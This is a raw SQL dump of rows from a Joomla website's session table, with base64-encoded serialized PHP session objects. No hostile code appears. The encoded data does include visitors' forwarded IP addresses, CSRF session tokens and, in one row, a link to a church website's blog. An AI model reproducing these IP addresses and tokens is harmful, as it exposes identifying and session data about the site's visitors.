(0x3835623363326362626333323666336433383235326233333239633434343462, 0, 1, 1569383488, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MzQ4ODtzOjQ6Imxhc3QiO2k6MTU2OTM4MzQ4ODtzOjM6Im5vdyI7aToxNTY5MzgzNDg4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjM1LjIyNi42OC4xMjkiO31zOjU6InRva2VuIjtzOjMyOiJIQ1VEb0lZbE8zdlhabW1ac0xoOWJjQ0xLUmU1eFVjRyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3836653331653730306266666531393963336533323134356331303561646435, 0, 1, 1569382085, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjA4NTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjA4NTtzOjM6Im5vdyI7aToxNTY5MzgyMDg1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTU6IjE3My4yMzAuMTMzLjE2NCI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3837383962653661336365326535626337623362343133666561646665663363, 0, 1, 1569384743, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDc0MztzOjQ6Imxhc3QiO2k6MTU2OTM4NDc0MztzOjM6Im5vdyI7aToxNTY5Mzg0NzQzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjUwLjExNi4zNi45MyI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3838376263363037336561643239363137643936646631636437373162663062, 0, 1, 1569383126, 'joomla|s:752:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MzEyNTtzOjQ6Imxhc3QiO2k6MTU2OTM4MzEyNTtzOjM6Im5vdyI7aToxNTY5MzgzMTI1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTA6IjQ1LjkzLjIwLjQiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3839663132373465663165613336616434356532383365393565366263663534, 0, 1, 1569382623, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjYyMztzOjQ6Imxhc3QiO2k6MTU2OTM4MjYyMztzOjM6Im5vdyI7aToxNTY5MzgyNjIzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMTIuMTAzIjt9czo1OiJ0b2tlbiI7czozMjoiRTJtYm1yeHJrOW82cU5zdWpUWGJzWVRTaDhjMjRNR08iO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3861333662363437386665366239316432353835386536313134343762383534, 0, 1, 1569376509, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NjUwOTtzOjQ6Imxhc3QiO2k6MTU2OTM3NjUwOTtzOjM6Im5vdyI7aToxNTY5Mzc2NTA5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6IjE5Ny4yMTAuNTMuMjEiO31zOjU6InRva2VuIjtzOjMyOiI5RnppRzJsV2lXWk1pMUIwQUVUdE1PV1FNT1VZR1dFayI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3861376433356234643533363961303762353263393435356335633736346131, 0, 1, 1569383489, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MzQ4OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MzQ4OTtzOjM6Im5vdyI7aToxNTY5MzgzNDg5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTE6IjQ1LjMzLjk5Ljg4Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3861386532306666313536653837343063636139323437323531353532396536, 0, 1, 1569378327, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3ODMyNztzOjQ6Imxhc3QiO2k6MTU2OTM3ODMyNztzOjM6Im5vdyI7aToxNTY5Mzc4MzI3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5Mi4xNTUuOTIuMTEyIjt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3861393763356231623937353635643664653438623930376433343335313738, 0, 1, 1569384744, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDc0NDtzOjQ6Imxhc3QiO2k6MTU2OTM4NDc0NDtzOjM6Im5vdyI7aToxNTY5Mzg0NzQ0O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjUwLjExNi4zNi45MyI7fXM6NToidG9rZW4iO3M6MzI6ImZoWHVVYkY5ZHJvUURQUFdJcE45SE5WMTVmU1Ryck9qIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3862313230356333616432323435643761613831633866303566366665666661, 0, 1, 1569385719, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTcxOTtzOjQ6Imxhc3QiO2k6MTU2OTM4NTcxOTtzOjM6Im5vdyI7aToxNTY5Mzg1NzE5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjE1Ny41NS4zOS44MyI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3862633864613763613937343531643566376630633564343261306165323065, 0, 1, 1569377880, 'joomla|s:1160:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3Nzg4MDtzOjQ6Imxhc3QiO2k6MTU2OTM3Nzg4MDtzOjM6Im5vdyI7aToxNTY5Mzc3ODgwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44My42MyI7fXM6NToidG9rZW4iO3M6MzI6Imhpa1BQbzh4ZDFmY0FYR0tDMEN5VGl4ZWt4VGtUbzEyIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiZjViMjFkNDY2OWMxNzA2ZjcwYTE4NDVhYjA1ZjU0YWQxOGU5NzlkMyI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjg1OiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vMzYtc2NyaXB0dXJhbC1jb25mZXNzaW9uIjtzOjY6ImV4cGlyeSI7aToxNTY5Mzc3ODgwO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3863386330626264323766306435303431333837663731353364343362393435, 0, 1, 1569385357, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTM1NztzOjQ6Imxhc3QiO2k6MTU2OTM4NTM1NztzOjM6Im5vdyI7aToxNTY5Mzg1MzU3O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTU6IjE3My4yMzAuMTMzLjE2NCI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3864316232626263303866393034323466663231643034386535346437366561, 0, 1, 1569384942, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk0MjtzOjQ6Imxhc3QiO2k6MTU2OTM4NDk0MjtzOjM6Im5vdyI7aToxNTY5Mzg0OTQyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJ0azRVaGc4VENQUFJSa3RYbTExWWYxbFo1WmJqQTBaRCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3865363464393664333633656137386664383165393331383862326539663864, 0, 1, 1569384982, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk4MjtzOjQ6Imxhc3QiO2k6MTU2OTM4NDk4MjtzOjM6Im5vdyI7aToxNTY5Mzg0OTgyO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJhS3FnM2VlZmxHUUZqd1NMOU0zOThuTTlVOGJoNHFSbSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3865646639333038613961303764656533363563306563623632383065666539, 0, 1, 1569377323, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzMyMztzOjQ6Imxhc3QiO2k6MTU2OTM3NzMyMztzOjM6Im5vdyI7aToxNTY5Mzc3MzIzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjE2My42OSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x3930313438633837343363643965636230626531626266313030316534343666, 0, 1, 1569380079, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MDA3OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MDA3OTtzOjM6Im5vdyI7aToxNTY5MzgwMDc5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44OC45MSI7fXM6NToidG9rZW4iO3M6MzI6Im1Ea0pQNUMwUkVtNkx1a3Z2UDBDRXdmV29VbTd0QWE1Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x3930396462383765656139613637663435316161643266323339313361373730, 0, 1, 1569382136, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjEzNjtzOjQ6Imxhc3QiO2k6MTU2OTM4MjEzNjtzOjM6Im5vdyI7aToxNTY5MzgyMTM2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJRRnRLTFNaNjRkNENpMXkzdGM0dWRTWURUbmNPZVM0SiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x3931613035303832333732333837353366353138373634373539396539373135, 0, 1, 1569382273, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjI3MztzOjQ6Imxhc3QiO2k6MTU2OTM4MjI3MztzOjM6Im5vdyI7aToxNTY5MzgyMjczO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
